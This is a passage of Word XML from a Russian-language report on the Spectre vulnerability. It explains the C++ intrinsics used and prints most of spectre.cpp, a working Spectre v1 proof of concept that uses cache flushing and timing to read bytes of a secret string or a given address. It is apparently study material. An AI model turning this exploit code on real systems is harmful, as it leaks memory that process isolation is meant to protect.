          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.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 Для этого потребуется очень точный измеритель </w:t>
      </w:r>
      <w:r w:rsidR="00A97FDE" w:rsidRPr="00A97FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00A97FDE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A97FDE" w:rsidRPr="00A97FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”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 и в целом очень точные низкоуровневые запросы, </w:t>
      </w:r>
      <w:r w:rsidR="00A40109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 был выбран язык </w:t>
      </w:r>
      <w:r w:rsidR="00A97FD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, который позже был заменён на </w:t>
      </w:r>
      <w:r w:rsidR="00A97FD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97FDE" w:rsidRPr="00A97FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>++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 из-за </w:t>
      </w:r>
      <w:r w:rsidR="009910B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>несущественных</w:t>
      </w:r>
      <w:r w:rsidR="00A97FDE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> различий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D406178" w14:textId="0604F36E" w:rsidR="00EC60D4" w:rsidRDefault="00EC60D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47EA4A" w14:textId="77C3CA9A" w:rsidR="00266A57" w:rsidRPr="00CE4912" w:rsidRDefault="00275886" w:rsidP="00256953">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE4912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</w:p>
    <w:p w14:paraId="35AEA970" w14:textId="157FBF11" w:rsidR="00E003B1" w:rsidRDefault="002478BA" w:rsidP="00381001">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1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был написан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478BA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файле </w:t>
      </w:r>
      <w:r w:rsidRPr="002478BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spectre</w:t>
      </w:r>
      <w:r w:rsidRPr="002478BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002478BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs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утствуют небольшие комментарии. Однако основной принцип уязвимости был описан в теоретической части, остаётся только реализовать его на выбранном языке. </w:t>
      </w:r>
      <w:r w:rsidR="00E003B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Среди специфичных </w:t>
      </w:r>
      <w:r w:rsidR="00D61500">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функций</w:t>
      </w:r>
      <w:r w:rsidR="00E003B1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E003B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E003B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> функции языка </w:t>
      </w:r>
      <w:r w:rsidR="00E003B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DAEE46" w14:textId="77777777" w:rsidR="004E49D1" w:rsidRPr="00733619" w:rsidRDefault="004E49D1" w:rsidP="00E92460">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="454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33619">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_mm_clflush</w:t>
      </w:r>
      <w:r w:rsidRPr="00733619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Очищает из памяти объект/массив</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215BC8A" w14:textId="77777777" w:rsidR="0036253D" w:rsidRPr="0036253D" w:rsidRDefault="004E49D1" w:rsidP="00E92460">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="454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33619">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_mm_mfence</w:t>
      </w:r>
      <w:r w:rsidRPr="007336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D7810" w:rsidRPr="00733619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ожидает</w:t>
      </w:r>
      <w:r w:rsidRPr="00733619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> завершения всех операций с </w:t>
      </w:r>
      <w:r w:rsidR="000A2E2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>памятью</w:t>
      </w:r>
      <w:r w:rsidRPr="00733619">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/кэшем</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5ED4B0" w14:textId="592520C1" w:rsidR="004C3666" w:rsidRPr="004C3666" w:rsidRDefault="00A14545" w:rsidP="00E92460">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="454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85616">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>__rdtscp</w:t>
      </w:r>
      <w:r w:rsidRPr="00985616">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – достаточно точный таймер для измерения </w:t>
      </w:r>
      <w:r w:rsidR="00C302BC" w:rsidRPr="00985616">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>времени</w:t>
      </w:r>
      <w:r w:rsidRPr="00985616">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> обращения </w:t>
      </w:r>
      <w:r w:rsidR="00985616" w:rsidRPr="00985616">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к ячейке</w:t>
      </w:r>
      <w:r w:rsidRPr="00985616">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> памяти</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA5C05" w14:textId="19C0038A" w:rsidR="007E6B90" w:rsidRPr="00C82744" w:rsidRDefault="00A25515" w:rsidP="00C82744">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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аботает как с отключённой оптимизацией (</w:t>
      </w:r>
      <w:r w:rsidRPr="00165C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00165C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2551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и с </w:t>
      </w:r>
      <w:r w:rsidR="00166358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>включё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65C23">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ofast</w:t>
      </w:r>
      <w:r w:rsidR="0024075E" w:rsidRPr="00A4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075E" w:rsidRPr="0024075E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sse</w:t>
      </w:r>
      <w:r w:rsidR="0024075E" w:rsidRPr="00A46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075E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>avx</w:t>
      </w:r>
      <w:r w:rsidR="0024075E" w:rsidRPr="0024075E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CD7D2B" w:rsidRPr="00A4684A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и т.п.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2551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что является преимуществом.</w:t>
      </w:r>
      <w:r w:rsidR="00C82744">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Компилятор, использовавшийся для тестирования указан в разделе Листинг.</w:t>
      </w:r>
      <w:r w:rsidR="007E6B90" w:rsidRPr="004C366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5BA78B2" w14:textId="57ACA81E" w:rsidR="008610E5" w:rsidRPr="007E1D13" w:rsidRDefault="00A26E0A" w:rsidP="008610E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CE4912">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE62EBF" w14:textId="77777777" w:rsidR="00ED5646" w:rsidRPr="007E1D13" w:rsidRDefault="00ED5646" w:rsidP="001805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5F675B" w14:textId="59175F35" w:rsidR="00ED5646" w:rsidRPr="000F0BA5" w:rsidRDefault="00ED5646" w:rsidP="00A1000E">
      <w:pP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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4912">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Компилятор</w:t>
      </w:r>
      <w:r w:rsidRPr="000F0BA5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20892" w:rsidRPr="000F0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gcc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version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 8.1.0 (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x</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>86_64-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posix</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-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seh</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-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rev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0,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Built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by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MinGW</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-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W</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="005B48FF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r w:rsidR="005B48FF" w:rsidRPr="000F0BA5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595975F0" w14:textId="77777777" w:rsidR="00ED5646" w:rsidRPr="000F0BA5" w:rsidRDefault="00ED5646" w:rsidP="00180561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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CFE38E" w14:textId="316E81B9" w:rsidR="003F5F4E" w:rsidRPr="0016032F" w:rsidRDefault="00EC60D4" w:rsidP="00180561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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spectre</w:t>
      </w:r>
      <w:r w:rsidR="00C275EC"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.</w:t>
      </w:r>
      <w:r w:rsidR="001D0345"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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A2C5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// #include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A449F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include &lt;stdint.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7722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include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA457E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4CD292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include &lt;algorithm&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB0E7A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include &lt;iostream&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2EE3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// #include &lt;cstring&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AA9C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C00D8D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include &lt;intrin.h&gt;  // x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178A9E5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// #include &lt;x86intrin.h&gt; // x32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA713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C050DA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pragma GCC optimize("Ofast")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E8FFD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pragma GCC target("sse,sse2,sse3,ssse3,sse4,popcnt,abm,mmx,tune=native")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAB4B2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pragma GCC target("avx2")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6EB03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46A3B6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A7635C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14:paraId="63F9550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3FC98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// ---------------------------------------------------- Target code ----------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D24288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3371B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size_t array1_size = 1;  // Tried 8, 16, 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239EA65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unsigned char array1[1] = {107};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860333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D9AB0F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unsigned char array2[256 * 1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728476C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ECCC7B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const char *TARGET = "There is no \"Exception\" in this library";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7115BB9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9CBB94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unsigned char no_optimize = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790803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void just_an_ordinary_function(size_t x) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D945FA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x &lt; array1_size) no_optimize |= array2[array1[x] * 1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10266C0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D0BF52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EC8CF7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8CC744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// --------------------------------------------------- Analysis code ---------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694C1E6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3DF57B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define CACHE_THRESHOLD (120)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33F18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#define LOOPS (50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C6764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9B55E2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pair&lt;pair&lt;char, char&gt;, unsigned int*&gt; get_byte(size_t target_pos) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE9295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unsigned int results[256] = {0};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E423D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int best, second_best;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40715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647BAF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unsigned int tmp = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD6D3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size_t x, y;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B32FF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volatile unsigned char *tmp_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4243186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30BF7D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uint64_t tmp_time, mem_access_time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2EE2F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AC5257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attempt = 0; attempt &lt; 1000; ++attempt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683B585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7B8E316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256; ++i) _mm_clflush(&amp;array2[i * 1024]);  // Clear array2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AECA8E6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418343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y = attempt % array1_size;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98898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j = 0; j &lt; LOOPS; ++j) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0246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_mm_clflush(&amp;array1_size);  // Clear array1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E17DF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3ABA62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_mm_mfence();  // Wait to finish all operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1141F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volatile int i = 0; i &lt; 250; ++i) {} // Extra delay, could be smaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D665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2ED0DB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// just_an_ordinary_function(j % 7 == 0 ? target_pos + attempt : 0);  // Old</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B34496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FF19E9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x = ((j % 6) - 1) &amp; ~USHRT_MAX;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435CA41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x = (x &gt;&gt; 16) | x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541120B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x = (x &amp; (target_pos ^ y)) ^ y;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021C69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just_an_ordinary_function(x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC066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201DF00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78D7A1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256; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49914D0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nt j = ((i * 107) + 11) &amp; 255;  // Mixing values of i ([0:256), no optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6645A1E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tmp_addr = &amp;array2[j * 1024];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860B48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0FB16F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tmp_time = __rdtscp(&amp;tmp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAD76E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tmp = *tmp_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7159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mem_access_time = __rdtscp(&amp;tmp) - tmp_time;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C533D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26309C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// Cache hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7B4AD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j != array1[attempt % array1_size] &amp;&amp; mem_access_time &lt;= CACHE_THRESHOLD) ++results[j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2533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1B6F91F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240807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// Max value and second max value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DEC4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best = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ADB0A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second_best = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5F39E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256; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3E46E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best == -1 || results[i] &gt;= results[best]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C34392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second_best = best;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A828B6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best = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29D0C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 else if (second_best == -1 || results[i] &gt;= results[second_best]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383AE8D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second_best = i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470245D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3D3DE72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0AD996C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7A922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results[best] &gt;= (2 * results[second_best]) || (results[best] == 2 &amp;&amp; results[second_best] == 0)) break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7144F88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7DFEDBC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4377C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results[0] ^= tmp;  // "tmp" is used (not optimized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856F69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B3DFA6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return make_pair(make_pair(best, second_best), results);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB560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4E0D90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0F2FD7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4F2BE36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>int main(int argc, char* argv[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77DA6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// ios_base::sync_with_stdio(false);cin.tie(NULL);cout.tie(NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401C75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349BB2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char * new_target;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DEA4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B31DCE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size_t target_pos;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5118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int len = 39;  // Target length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EADCF3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CF452A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// Fill array2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1413449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sizeof(array2); ++i) array2[i] = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423BBEC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</w:p>
    <w:p w14:paraId="0912DBA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3810C6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argc &gt;= 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4AAF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target_pos = (size_t)(argv[1] - (char *) array1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0D69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sscanf(argv[2], "%d", &amp;len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B957D0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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA606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target_pos = (size_t)(TARGET - (char *) array1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80B71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56FBDFB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7C34A5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char result[len];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0724E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pair&lt;pair&lt;char, char&gt;, unsigned int*&gt; cur_guess;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1E6D3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D5151B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argc &gt;= 4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7C44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ILE * output = fopen(argv[3], "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF27F0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 xml:space="preserve">    // fprintf(output, "P%d\n%d %d\n%d\n", (colored ? 6 : 5), width, height, color_space);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF630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087656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 xml:space="preserve">    fprintf(output, "Reading %d bytes:\n", len);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2548FF8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len; ++i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C80785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printf(output, "Reading 0x%X... ", (void *) target_pos);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796BE8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D186883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ur_guess = get_byte(target_pos++);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6E1BC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printf(output, "%s: ", (cur_guess.second[0] &gt;= 2 * cur_guess.second[1] ? "Success" : "Unclear"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D090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5C0E41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result[i] = ((cur_guess.first.first &gt; 31 &amp;&amp; cur_guess.first.first &lt; 127) ? cur_guess.first.first : '?');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FAC17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</w:p>
    <w:p w14:paraId="25DD934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printf(output, "0x%02X='%c' hits=%d", cur_guess.first.first, result[i], cur_guess.second[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4068E85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</w:p>
    <w:p w14:paraId="13A5EC4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cur_guess.second[1] &gt; 0) fprintf(output, " (second best: 0x%02X hits=%d)", cur_guess.first.second, cur_guess.second[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66531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38F218D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printf(output, "\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550709E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0A1370C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6DA734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 xml:space="preserve">   </w:t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len; ++i) fprintf(output, "%c", result[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25858E1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printf(output, "\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7CDC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38E66E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90F297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 xml:space="preserve">    fclose(output);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6FA9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7B7975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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936D34F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out &lt;&lt; "Reading " &lt;&lt; len &lt;&lt; " bytes:" &lt;&lt; endl;</w:t>
      </w:r>
    </w:p>
